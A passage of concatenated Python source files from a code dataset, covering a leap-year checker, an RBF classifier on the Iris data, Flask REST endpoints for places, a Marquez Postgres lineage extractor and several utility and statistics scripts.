var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} LR highresSST-present {} data requests created.'.\n format(num_created, var_lab))\n\n\nif __name__ == \"__main__\":\n cmd_args = parse_args()\n\n # determine the log level\n if cmd_args.log_level:\n try:\n log_level = getattr(logging, cmd_args.log_level.upper())\n except AttributeError:\n logger.setLevel(logging.WARNING)\n logger.error('log-level must be one of: debug, info, warn or error')\n sys.exit(1)\n else:\n log_level = DEFAULT_LOG_LEVEL\n\n # configure the logger\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': DEFAULT_LOG_FORMAT,\n },\n },\n 'handlers': {\n 'default': {\n 'level': log_level,\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['default'],\n 'level': log_level,\n 'propagate': True\n }\n }\n })\n\n # run the code\n main(cmd_args)\n","sub_path":"scripts/update_dreqs/update_dreqs_0103.py","file_name":"update_dreqs_0103.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311159179","text":"#Gregorian calendar, the years 2000 and 2400 are leap years,\n#while 1800, 1900, 2100, 2200, 2300 and 2500 are NOT leap years.\n\n\ndef leap_year():\n year = int(input(\"Enter year to check if is a leap year or enter 0 to quit: \"))\n while year != 0:\n \n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n print(\"{0} is a leap year\".format(year))\n year = int(input(\"Enter year to check if is a leap year or enter 0 to quit: \"))\n else:\n print(\"{0} is not a leap year\".format(year))\n year = int(input(\"Enter year to check if is a leap year or enter 0 to quit: \"))\n\nif __name__ == \"__main__\":\n\n leap_year()","sub_path":"leap_year.py","file_name":"leap_year.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"490823221","text":"import itertools\nfrom typing import List\n\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.utils import shuffle\n\nfrom backpropagation_perceptron import BackpropagationPerceptron as Perceptron\nfrom nn_utils import one_hot_decode, load_folded_and_zero_normalized_iris, format_multineuron_network_output\n\n\ndef phi(first_vector: np.ndarray,\n second_vector: np.ndarray,\n sigma: float\n ) -> float:\n dividend = - np.linalg.norm(first_vector - second_vector) ** 2\n divisor = 2 * (sigma ** 2)\n\n expoent = dividend / divisor\n phi_result = np.exp(expoent)\n return phi_result\n\n\ndef compute_rbf_hidden_layer_output(centroids: np.ndarray,\n input_vector: np.ndarray,\n sigma: float\n ) -> np.ndarray:\n hlo = [phi(first_vector=current_centroid, second_vector=input_vector, sigma=sigma)\n for current_centroid\n in centroids]\n hlo = np.asarray(hlo)\n return hlo\n\n\ndef train_rbf_output_layer(neurons: List[Perceptron],\n hidden_layer_output: np.ndarray,\n expected_output: np.ndarray\n ):\n for neuron_index, neuron in enumerate(neurons):\n neuron.predict_and_learn_as_output_layer(input_vector=hidden_layer_output,\n expected_output=expected_output[neuron_index])\n\n\ndef compute_rbf_output_layer_output(neurons: List[Perceptron],\n hidden_layer_output: np.ndarray\n ) -> np.ndarray:\n output = np.ndarray(len(neurons))\n for neuron_index, neuron in enumerate(neurons):\n output[neuron_index] = neuron.get_output_signal(input_vector=hidden_layer_output)\n\n return output\n\n\ndef main():\n for train_instances, train_labels, test_instances, test_labels in load_folded_and_zero_normalized_iris():\n classes_count = 3\n\n # We could use KMeans to find K centroids... Or we could use the usually-unfeasible strategy of using\n # each instance as a centroid :3 we'll do that, since the dataset is small enough\n centroids = train_instances\n centroid_count = train_instances.shape[0]\n\n # To compute the sigma we use 2 in the following func because we need to combine each centroid to each other,\n # hence all combinations, 2 by 2\n all_combinations_of_centroids = list(itertools.combinations(centroids, 2))\n all_distances = (np.linalg.norm(v1 - v2) for v1, v2 in all_combinations_of_centroids)\n sigma = max(all_distances) / np.sqrt(\n 2 * centroid_count) # Number of classes is multiplied by 2 because the algorithm says so\n\n if sigma == 0:\n raise Exception(\"wtf\")\n\n # The network itself is basically the output neuron + the centroids\n output_neurons = [Perceptron(n_inputs=len(centroids)),\n Perceptron(n_inputs=len(centroids)),\n Perceptron(n_inputs=len(centroids))]\n\n # Training the network\n train_labels = OneHotEncoder(sparse=False).fit_transform(X=train_labels)\n maximum_eras = 200\n for era in range(maximum_eras):\n train_instances, train_labels = shuffle(train_instances, train_labels)\n for instance, label in zip(train_instances, train_labels):\n hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n input_vector=instance,\n sigma=sigma)\n train_rbf_output_layer(neurons=output_neurons,\n hidden_layer_output=hidden_layer_output,\n expected_output=label)\n\n # Testing\n predicted_labels = []\n for instance, label in zip(test_instances, test_labels):\n hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n input_vector=instance,\n sigma=sigma)\n\n rbf_output = compute_rbf_output_layer_output(neurons=output_neurons,\n hidden_layer_output=hidden_layer_output)\n rbf_output = format_multineuron_network_output(rbf_output)\n\n predicted_labels.append(rbf_output)\n\n predicted_labels = np.asarray(predicted_labels)\n\n # Decoding labels\n test_labels = one_hot_decode(test_labels)\n predicted_labels = one_hot_decode(predicted_labels)\n\n print(f\"RBF Accuracy: {accuracy_score(y_true=test_labels, y_pred=predicted_labels)}\"\n f\"\\nMLP confusion matrix\"\n f\"\\n{confusion_matrix(y_true=test_labels, y_pred=predicted_labels)}\"\n f\"\\n\")\n\n # # Algorithm parameters\n # maximum_eras = 200\n # shuffle_every_n_eras = 5\n #\n # # Loading the dataset\n # all_instances, all_labels = load_iris(return_X_y=True)\n #\n # # Because reasons\n # all_instances = all_instances.astype(float)\n # all_labels = all_labels.reshape(-1, 1).astype(float)\n #\n # # Normalizing the dataset\n # all_instances = MinMaxScaler().fit_transform(all_instances)\n #\n # # K-Folding\n # set_splitter = StratifiedKFold(n_splits=10, shuffle=True)\n # for train_indexes, test_indexes in set_splitter.split(X=all_instances, y=all_labels):\n # # Separating the instances and labels\n # train_instances = np.asarray([all_instances[i] for i in train_indexes])\n # train_labels = [all_labels[i] for i in train_indexes]\n #\n # test_instances = np.asarray([all_instances[i] for i in test_indexes])\n # test_labels = [all_labels[i] for i in test_indexes]\n #\n # # Since our network will have a single neuron, we must encode the classes\n # train_labels = OneHotEncoder(sparse=False).fit_transform(X=train_labels)\n # test_labels = OneHotEncoder(sparse=False).fit_transform(X=test_labels)\n #\n # # Finding the centroids\n # centroid_count = 150\n # # centroids = KMeans(n_clusters=centroid_count).fit(test_instances).cluster_centers_\n # # centroids = np.asarray(centroids)\n # centroids = train_instances\n #\n # # Computing the sigma\n # # We use 2 in the following func because we need to combine each centroi to each other, hence all combinations,\n # # 2 by 2\n # all_combinations_of_centroids = list(itertools.combinations(centroids, 2))\n # all_distances = (np.linalg.norm(v1 - v2) for v1, v2 in all_combinations_of_centroids)\n #\n # # Number of classes is multiplied by 2 because the algorithm says so\n # sigma = max(all_distances) / np.sqrt(2 * centroid_count)\n # if sigma == 0:\n # print(\"wtf\")\n #\n # # The network itself is basically the output neuron + the centroids\n # output_neurons = [Perceptron(n_inputs=len(centroids)),\n # Perceptron(n_inputs=len(centroids)),\n # Perceptron(n_inputs=len(centroids))]\n #\n # # Training the network\n # for era in range(maximum_eras):\n # if era % shuffle_every_n_eras:\n # train_instances, train_labels = shuffle(train_instances, train_labels)\n #\n # for instance, label in zip(train_instances, train_labels):\n # hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n # input_vector=instance,\n # sigma=sigma)\n #\n # train_rbf_output_layer(neurons=output_neurons,\n # hidden_layer_output=hidden_layer_output,\n # expected_output=label)\n #\n # # Testing\n # predicted_labels = []\n # for instance in test_instances:\n # hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n # input_vector=instance,\n # sigma=sigma)\n #\n # rbf_output = compute_rbf_output_layer_output(neurons=output_neurons,\n # hidden_layer_output=hidden_layer_output)\n # rbf_output = format_multineuron_network_output(rbf_output)\n # predicted_labels.append(rbf_output)\n #\n # predicted_labels = np.asarray(predicted_labels)\n #\n # # Decoding labels\n # test_labels = one_hot_decode(test_labels)\n # predicted_labels = one_hot_decode(predicted_labels)\n #\n # print(f\"RBF Accuracy: {accuracy_score(y_true=test_labels, y_pred=predicted_labels)}\")\n # print(\"MLP confusion matrix\")\n # print(confusion_matrix(y_true=test_labels, y_pred=predicted_labels))\n # print()\n\n\nif __name__ == '__main__':\n main()\n print(\"\\nDone!\")\n","sub_path":"nn/radial_basis_function.py","file_name":"radial_basis_function.py","file_ext":"py","file_size_in_byte":9335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"591629595","text":"import setuptools\n\nVERSION = '0.3rc0'\n\nsetuptools.setup(\n name='fabulus',\n version=VERSION,\n author='Stefan B, Alexander R',\n author_email='Steve2608@users.noreply.github.com',\n url='https://github.com/AlexRaschl/FABULUS-A-machine-learning-enterprise',\n download_url='https://github.com/AlexRaschl/FABULUS-A-machine-learning-enterprise/archive/'\n f'v_{VERSION}.tar.gz',\n description='Utility packages for Machine Learning and Data Visualisation',\n packages=[\n 'fabulus',\n 'fabulus/_internal',\n 'fabulus/io',\n 'fabulus/net',\n 'fabulus/postprocessing',\n 'fabulus/unsup',\n 'fabulus/vis',\n ],\n classifiers=[\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'\n ],\n install_requires=[\n 'matplotlib',\n 'numpy',\n 'sklearn',\n 'seaborn',\n 'tensorflow'\n ]\n)\n","sub_path":"pypi_install_script/fabulus-0.3rc0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34794981","text":"#!/usr/bin/python3\n\"\"\"\nNew view for State objects that handles all default\nRestFul API actions\n\"\"\"\nfrom flask import Flask, jsonify, Blueprint, abort, request\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom models.place import Place\nfrom models.user import User\n\n\n@app_views.route('/cities//places',\n methods=['GET'], strict_slashes=False)\ndef all_places(city_id=None):\n \"\"\" Retrieves the list of all places of a City objects \"\"\"\n cities_id = storage.get(City, city_id)\n if cities_id is None:\n abort(404)\n list_dic_places = []\n for place in cities_id.places:\n list_dic_places.append(place.to_dict())\n\n return jsonify(list_dic_places)\n\n\n@app_views.route('/places/', methods=['GET'], strict_slashes=False)\ndef places_id(place_id=None):\n \"\"\" Retrieves a Place object \"\"\"\n places_id = storage.get(Place, place_id)\n if places_id is None:\n abort(404)\n\n return jsonify(places_id.to_dict())\n\n\n@app_views.route('/places/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_place(place_id=None):\n \"\"\" Delete a Place object \"\"\"\n places_id = storage.get(Place, place_id)\n if places_id is None:\n abort(404)\n\n storage.delete(places_id)\n storage.save()\n\n return jsonify({}), 200\n\n\n@app_views.route('/cities//places',\n methods=['POST'], strict_slashes=False)\ndef create_place(city_id):\n \"\"\" Create a Place object \"\"\"\n cities_id = storage.get(City, city_id)\n if cities_id is None:\n abort(404)\n if not request.get_json():\n return jsonify({\"error\": \"Not a JSON\"}), 400\n if 'user_id' not in request.get_json():\n return jsonify({\"error\": \"Missing user_id\"}), 400\n\n req_place = request.get_json()\n if storage.get(User, req_place['user_id']) is None:\n abort(404)\n if 'name' not in req_place:\n return jsonify({\"error\": \"Missing name\"}), 400\n\n req_place['city_id'] = city_id\n req_place['user_id'] = req_place['user_id']\n new_place = Place(**req_place) # kwargs\n\n storage.new(new_place)\n storage.save()\n\n return jsonify(new_place.to_dict()), 201\n\n\n@app_views.route('/places/', methods=['PUT'], strict_slashes=False)\ndef update_place_id(place_id=None):\n \"\"\" Update a City object \"\"\"\n places_id = storage.get(Place, place_id)\n req_place = request.get_json()\n if places_id is None:\n abort(404)\n if not req_place:\n return jsonify({\"error\": \"Not a JSON\"}), 400\n\n for key, values in req_place.items():\n if key not in ['id', 'user_id', 'city_id', 'created_at', 'update_at']:\n setattr(places_id, key, values)\n\n storage.save()\n\n return jsonify(places_id.to_dict()), 200\n","sub_path":"api/v1/views/places.py","file_name":"places.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"430009665","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/brainfreeze/extension.py\n# Compiled at: 2008-11-10 02:21:45\n\"\"\"OneToOne MapperExtension\"\"\"\nfrom sqlalchemy import util\nfrom sqlalchemy.orm import MapperExtension, class_mapper, EXT_CONTINUE\nfrom sqlalchemy.exceptions import ArgumentError\nfrom properties import one_to_one\n__all__ = [\n 'OneToOneMapperExtension']\n\nclass OneToOneMapperExtension(MapperExtension):\n \"\"\"MapperExtension to proxy properties on one-to-one relations.\n\n This extension proxies access to all properties of the specified\n one-to-one relations without an intermediate layer. \n \n The intended use case is to allow a type composed of multiple tables to\n be easily mapped and queried as if it were one table.\n\n \"\"\"\n\n def __init__(self, *related_classes, **kwargs):\n if len(util.to_list(related_classes)) != len(util.to_set(related_classes)):\n raise ArgumentError('Name collision, classes may only be specified once: %r' % related_classes)\n self.related_classes = util.to_list(related_classes)\n self.property_prefix = kwargs.get('property_prefix', '_')\n\n def instrument_class(self, mapper, class_):\n for value_class in self.related_classes:\n value_mapper = class_mapper(value_class, compile=False)\n key = self.property_prefix + value_mapper.local_table.key\n if key in mapper._init_properties:\n raise ArgumentError(\"OneToOne relation '%s' conflicts with existing property\" % key)\n mapper._init_properties[key] = one_to_one(value_class)\n\n return EXT_CONTINUE","sub_path":"pycfiles/BrainFreeze-0.1rc2-py2.5/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"115339639","text":"'''\nThis module contains utility functions for interacting with Notepad++.\n'''\n\nimport Npp\n\ndef eol_string():\n '''\n Returns the EOL string that the corresponds to the current EOL mode.\n '''\n eol_mode = Npp.editor.getEOLMode()\n eol_mode_character_map = {\n int(Npp.ENDOFLINE.CRLF) : '\\r\\n',\n int(Npp.ENDOFLINE.CR) : '\\r',\n int(Npp.ENDOFLINE.LF) : '\\n'}\n return eol_mode_character_map[eol_mode]\n","sub_path":"npp_utils.py","file_name":"npp_utils.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"649298433","text":"from __future__ import division\nimport cPickle\nimport dependency_tree\nimport itertools\nimport numpy as np\nfrom collections import Counter, defaultdict\nfrom scipy import stats\nfrom scipy.stats import entropy\n\n\ndef get_stats_rst(rstdeps):\n heights = []\n node_depths = Counter()\n root_position = Counter()\n root_first = 0\n root_last = 0\n num_roots = 0\n normalized_arc_lengths = []\n leaf_node_proportions = []\n parent_entropies = []\n\n for rstdep in rstdeps:\n edges = rstdep.edges\n\n deps = defaultdict(list)\n for edge in edges:\n parent = edge.tgt_idx\n child = edge.src_idx\n if parent is None:\n parent = -1\n deps[parent].append(child)\n\n parents = deps.keys() # includes root -1\n num_nodes = len(list(itertools.chain.from_iterable(deps.values())))\n\n # how long are the edges?\n normalized_arc_lengths.extend(get_arc_length(edges))\n\n # how many nodes are leaves?\n num_parents = len(parents) - 1 # don't count root\n leaf_node_proportions.append(get_leaf_proportion(edges, num_parents))\n\n # how many children per parent?\n parent_entropies.append(entropy_for_parents(parents))\n\n heights.append(len(deps.keys()))\n # build node depth for this doc\n doc_node_depths = {}\n for parent_num, parent in enumerate(deps.keys()):\n doc_node_depths[parent_num] = len(deps[parent])\n\n for key, value in doc_node_depths.items():\n node_depths[key] += value\n\n roots = np.array(deps[-1])\n\n for root in roots:\n num_roots += 1\n if root == 0:\n root_first += 1\n elif root == num_nodes-1:\n root_last += 1\n # create 3 bins, for beginning, middle, end of doc\n bins = np.array_split(np.arange(num_nodes), 3)\n for ix, bin in enumerate(bins):\n if root in bin:\n root_position[ix] += 1\n\n print(\"Stats for normalized arc length: \", np.mean(np.array(normalized_arc_lengths)),\n np.std(np.array(normalized_arc_lengths)), np.min(np.array(normalized_arc_lengths)),\n np.max(np.array(normalized_arc_lengths)))\n print(\"Stats for leaf node proportions: \", np.mean(np.array(leaf_node_proportions)),\n np.std(np.array(leaf_node_proportions)), np.min(np.array(leaf_node_proportions)),\n np.max(np.array(leaf_node_proportions)))\n print(\"Stats for parent entropy: \", np.mean(np.array(parent_entropies)),\n np.std(np.array(parent_entropies)), np.min(np.array(parent_entropies)),\n np.max(np.array(parent_entropies)))\n print(\"Processed \", len(rstdeps), \" trees.\")\n print(\"\\nStats for heights: \")\n print(np.mean(heights), np.std(heights), np.min(heights), np.max(heights), Counter(heights).keys(),\n Counter(heights).values() / np.sum(Counter(heights).values()))\n print(\"\\nStats for node depths: \")\n print(node_depths.keys(), node_depths.values() / np.sum(node_depths.values()))\n print(\"\\nRoot to position in sentence: \")\n print(\"First: \", root_first/num_roots, \", Last: \", root_last/num_roots, \"Bins: \", root_position.keys(),\n root_position.values() / np.sum(root_position.values()))\n\n\ndef get_stats(docs):\n heights = []\n node_depths = Counter()\n sentiments = []\n sent_scores = []\n other_sent_scores = []\n root_sentiments = []\n root_sent_scores = []\n root_position = Counter()\n root_first = 0\n root_last = 0\n correct_docs = 0\n num_roots = 0\n normalized_arc_lengths = []\n leaf_node_proportions = []\n parent_entropies = []\n\n for doc in docs:\n if doc.gold_label == doc.predicted_label:\n # how long are the edges?\n edges = doc.tree.edges\n normalized_arc_lengths.extend(get_arc_length(edges))\n\n # how many nodes are leaves?\n num_parents = len(doc.tree.deps.keys()) - 1 # don't count the root\n leaf_node_proportions.append(get_leaf_proportion(edges, num_parents))\n\n # how many children per parent?\n parent_entropies.append(get_parent_entropy(doc, edges))\n\n correct_docs += 1\n heights.append(doc.tree.height)\n for key, value in doc.tree.node_depths.items():\n node_depths[key] += value\n sentiments.extend(doc.sentiments)\n sent_scores.extend(doc.sentiment_scores)\n roots = np.array(doc.tree.deps[0])-1 # need to subtract to account for 0 root in the tree\n\n for root in roots:\n num_roots += 1\n if root == 0:\n root_first += 1\n elif root == len(doc.sentiments)-1:\n root_last += 1\n # create 3 bins, for beginning, middle, end of doc\n bins = np.array_split(np.arange(len(doc.sentiments)), 3)\n for ix, bin in enumerate(bins):\n if root in bin:\n root_position[ix] += 1\n root_sentiments.append(doc.sentiments[root])\n root_sent_scores.append(doc.sentiment_scores[root])\n mask_roots = np.ones(len(doc.sentiment_scores), bool)\n mask_roots[roots] = False\n other_sent_scores.extend(np.array(doc.sentiment_scores)[mask_roots])\n\n print(\"Stats for normalized arc length: \", np.mean(np.array(normalized_arc_lengths)),\n np.std(np.array(normalized_arc_lengths)), np.min(np.array(normalized_arc_lengths)),\n np.max(np.array(normalized_arc_lengths)))\n print(\"Stats for leaf node proportions: \", np.mean(np.array(leaf_node_proportions)),\n np.std(np.array(leaf_node_proportions)), np.min(np.array(leaf_node_proportions)),\n np.max(np.array(leaf_node_proportions)))\n print(\"Stats for parent entropy: \", np.mean(np.array(parent_entropies)),\n np.std(np.array(parent_entropies)), np.min(np.array(parent_entropies)),\n np.max(np.array(parent_entropies)))\n print(\"Processed \", correct_docs, \" out of \", len(docs), \" documents that were labelled correctly.\")\n print(\"\\nStats for heights: \")\n print(np.mean(heights), np.std(heights), np.min(heights), np.max(heights), Counter(heights).keys(),\n Counter(heights).values() / np.sum(Counter(heights).values()))\n print(\"\\nStats for node depths: \")\n print(node_depths.keys(), node_depths.values() / np.sum(node_depths.values()))\n print(\"\\nStats for sentiments: \")\n print(np.mean(sentiments), np.std(sentiments), Counter(sentiments).keys(),\n Counter(sentiments).values() / np.sum(Counter(sentiments).values()))\n print(\"\\nStats for root sentiments: \")\n print(np.mean(root_sentiments), np.std(root_sentiments), Counter(root_sentiments).keys(),\n Counter(root_sentiments).values() / np.sum(Counter(root_sentiments).values()))\n print(\"\\nStats for sentiment scores: \")\n print(np.mean(np.abs(sent_scores)), np.std(np.abs(sent_scores)))\n print(\"\\nStats for root sentiment scores: \")\n print(np.mean(np.abs(root_sent_scores)), np.std(np.abs(root_sent_scores)))\n print(\"\\nRoot to position in sentence: \")\n print(\"First: \", root_first/num_roots, \", Last: \", root_last/num_roots, \"Bins: \", root_position.keys(),\n root_position.values() / np.sum(root_position.values()))\n t_stat, p_value_two_sided = stats.ttest_ind(np.abs(root_sent_scores), np.abs(other_sent_scores), equal_var=False)\n print(\"T-statistic: \", t_stat, \", p_value for rejecting null hypothesis that mean(other sents) >= mean(root sents)\",\n p_value_two_sided/2)\n\n\ndef get_parent_entropy(doc, edges):\n parents_list = []\n for i in range(1, len(edges) + 1):\n parent = next(key for key, value in doc.tree.deps.items() if i in value)\n parents_list.append(parent)\n return entropy_for_parents(parents_list)\n\n\ndef get_leaf_proportion(edges, num_parents):\n num_leaf_nodes = len(edges) - num_parents\n return num_leaf_nodes / len(edges)\n\n\ndef get_arc_length(edges):\n lengths = np.zeros([len(edges)])\n for i, edge in enumerate(edges):\n tgt_idx = edge.tgt_idx if edge.tgt_idx is not None else (edge.src_idx+1) # account for missing root in rst deps\n lengths[i] = np.abs(edge.src_idx - tgt_idx)\n lengths /= len(edges)\n return lengths\n\n\ndef entropy_for_parents(labels, base=None):\n value, counts = np.unique(labels, return_counts=True)\n return entropy(counts, base=base)\n\n\nif __name__ == '__main__':\n import sys\n from os import path\n\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n from data_structure import ProcessedDoc\n\n pickle_file = sys.argv[1]\n docs = cPickle.load(open(pickle_file))\n get_stats(docs)","sub_path":"postprocess/processed_doc_stats.py","file_name":"processed_doc_stats.py","file_ext":"py","file_size_in_byte":8785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"306672141","text":"\"\"\"---------------------------------------------------------------------------\nMODULE\n FANotifyUtils - generic methods required for the library\n\nDESCRIPTION\n This module contains the genric methods used by the FANotification library.\n\n---------------------------------------------------------------------------\"\"\"\n\nimport acm\n\ndef string_padding(data, limit=12):\n \"\"\"Performs string padding. It limits the length of logger source in notification logs.\"\"\"\n if len(data) < limit:\n data = data.ljust(limit)\n else:\n data = data[:limit]\n return data \n\ndef get_acm_user(user):\n \"\"\"Get ACM users\"\"\"\n acm_users = []\n invalid_users = []\n user_lst = string_as_list(user)\n if user_lst:\n for usr in user_lst:\n if acm.FUser[usr]:\n acm_users.append(acm.FUser[usr].Name())\n else:\n invalid_users.append(usr)\n return acm_users, invalid_users\n\ndef string_as_list(strng):\n \"\"\"Returns a list from string separated by comma\"\"\"\n lst = []\n if isinstance(strng, str):\n try:\n lst = eval(strng)\n except Exception:\n strng_split = strng.split(',')\n for data in strng_split:\n lst.append(data.strip().strip(\"'\").strip('\"'))\n elif isinstance(strng, type([])):\n for i in strng:\n if isinstance(i, str):\n lst.append(i.strip())\n else:\n lst.append(i)\n return lst\n","sub_path":"Extensions/FANotification/FPythonCode/FANotifyUtils.py","file_name":"FANotifyUtils.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"336170340","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom contextlib import closing\nfrom typing import Optional\nfrom urllib.parse import urlparse\n\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.postgres_operator import PostgresOperator\n\nfrom marquez.models import (\n DbTableName,\n DbTableSchema,\n DbColumn\n)\nfrom marquez_airflow.utils import get_normalized_postgres_connection_uri, get_connection\nfrom marquez.sql import SqlMeta, SqlParser\nfrom marquez_airflow.extractors.base import (\n BaseExtractor,\n StepMetadata\n)\nfrom marquez.dataset import Source, Dataset\n\n_TABLE_SCHEMA = 0\n_TABLE_NAME = 1\n_COLUMN_NAME = 2\n_ORDINAL_POSITION = 3\n# Use 'udt_name' which is the underlying type of column\n# (ex: int4, timestamp, varchar, etc)\n_UDT_NAME = 4\n\n\nclass PostgresExtractor(BaseExtractor):\n operator_class = PostgresOperator\n default_schema = 'public'\n\n def __init__(self, operator):\n super().__init__(operator)\n self.conn = None\n\n def extract(self) -> StepMetadata:\n # (1) Parse sql statement to obtain input / output tables.\n sql_meta: SqlMeta = SqlParser.parse(self.operator.sql, self.default_schema)\n\n # (2) Get database connection\n self.conn = get_connection(self._conn_id())\n\n # (3) Default all inputs / outputs to current connection.\n # NOTE: We'll want to look into adding support for the `database`\n # property that is used to override the one defined in the connection.\n source = Source(\n scheme=self._get_scheme(),\n authority=self._get_authority(),\n connection_url=self._get_connection_uri()\n )\n\n database = self.operator.database\n if not database:\n database = self._get_database()\n\n # (4) Map input / output tables to dataset objects with source set\n # as the current connection. We need to also fetch the schema for the\n # input tables to format the dataset name as:\n # {schema_name}.{table_name}\n inputs = [\n Dataset.from_table(\n source=source,\n table_name=in_table_schema.table_name.name,\n schema_name=in_table_schema.schema_name,\n database_name=database\n ) for in_table_schema in self._get_table_schemas(\n sql_meta.in_tables\n )\n ]\n outputs = [\n Dataset.from_table_schema(\n source=source,\n table_schema=out_table_schema,\n database_name=database\n ) for out_table_schema in self._get_table_schemas(\n sql_meta.out_tables\n )\n ]\n\n return StepMetadata(\n name=f\"{self.operator.dag_id}.{self.operator.task_id}\",\n inputs=inputs,\n outputs=outputs,\n context={\n 'sql': self.operator.sql\n }\n )\n\n def _get_connection_uri(self):\n return get_normalized_postgres_connection_uri(self.conn)\n\n def _get_scheme(self):\n return 'postgres'\n\n def _get_database(self) -> str:\n if self.conn.schema:\n return self.conn.schema\n else:\n parsed = urlparse(self.conn.get_uri())\n return f'{parsed.path}'\n\n def _get_authority(self) -> str:\n if self.conn.host and self.conn.port:\n return f'{self.conn.host}:{self.conn.port}'\n else:\n parsed = urlparse(self.conn.get_uri())\n return f'{parsed.hostname}:{parsed.port}'\n\n def _conn_id(self):\n return self.operator.postgres_conn_id\n\n def _information_schema_query(self, table_names: str) -> str:\n return f\"\"\"\n SELECT table_schema,\n table_name,\n column_name,\n ordinal_position,\n udt_name\n FROM information_schema.columns\n WHERE table_name IN ({table_names});\n \"\"\"\n\n def _get_hook(self):\n return PostgresHook(\n postgres_conn_id=self.operator.postgres_conn_id,\n schema=self.operator.database\n )\n\n def _get_table_schemas(\n self, table_names: [DbTableName]\n ) -> [DbTableSchema]:\n # Avoid querying postgres by returning an empty array\n # if no table names have been provided.\n if not table_names:\n return []\n\n # Keeps tack of the schema by table.\n schemas_by_table = {}\n\n hook = self._get_hook()\n with closing(hook.get_conn()) as conn:\n with closing(conn.cursor()) as cursor:\n table_names_as_str = \",\".join(map(\n lambda name: f\"'{name.name}'\", table_names\n ))\n cursor.execute(\n self._information_schema_query(table_names_as_str)\n )\n for row in cursor.fetchall():\n table_schema_name: str = row[_TABLE_SCHEMA]\n table_name: DbTableName = DbTableName(row[_TABLE_NAME])\n table_column: DbColumn = DbColumn(\n name=row[_COLUMN_NAME],\n type=row[_UDT_NAME],\n ordinal_position=row[_ORDINAL_POSITION]\n )\n\n # Attempt to get table schema\n table_key: str = f\"{table_schema_name}.{table_name}\"\n table_schema: Optional[DbTableSchema] = schemas_by_table.get(table_key)\n\n if table_schema:\n # Add column to existing table schema.\n schemas_by_table[table_key].columns.append(table_column)\n else:\n # Create new table schema with column.\n schemas_by_table[table_key] = DbTableSchema(\n schema_name=table_schema_name,\n table_name=table_name,\n columns=[table_column]\n )\n\n return list(schemas_by_table.values())\n","sub_path":"integrations/airflow/marquez_airflow/extractors/postgres_extractor.py","file_name":"postgres_extractor.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"586853021","text":"import os\nfrom datetime import datetime, timedelta\nimport click\nfrom copy import deepcopy as dcpy\n\nimport numpy as np\nfrom numpy.random import MT19937\nfrom numpy.random import RandomState, SeedSequence\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd \nimport holidays\n\nimport configuration as config\n\n@click.command()\n@click.option(\n \"-o\",\n \"--outdir\",\n required=True,\n type=click.Path(),\n help='Path to directory where the synthetic datasets should be stored'\n)\ndef main(outdir):\n rng = RandomState(MT19937(SeedSequence(config.seed)))\n\n berlin_holidays = holidays.DE(prov=\"BW\")\n\n num_employees = 20000\n num_jobsites = 200\n num_areas = 20\n num_qualifications = 40\n num_shifts = 3\n num_days = 356\n\n num_orders = 1000\n df = pd.DataFrame.from_dict({\n \"Einsatzort\": rng.randint(0, num_jobsites, num_orders),\n \"Qualifikation\":rng.randint(0, num_qualifications, num_orders),\n \"Schicht\": rng.randint(0, num_shifts, num_orders),\n \"Tag\": rng.randint(0, num_days, num_orders),\n })\n\n df[\"Tag\"] = df[\"Tag\"].apply(lambda day: datetime(2019, 1, 1)+ timedelta(day))\n df[\"Wochentag\"] = df[\"Tag\"].apply(lambda day: day.strftime(\"%a\"))\n df[\"Feiertag\"] = df[\"Tag\"].apply(lambda day: 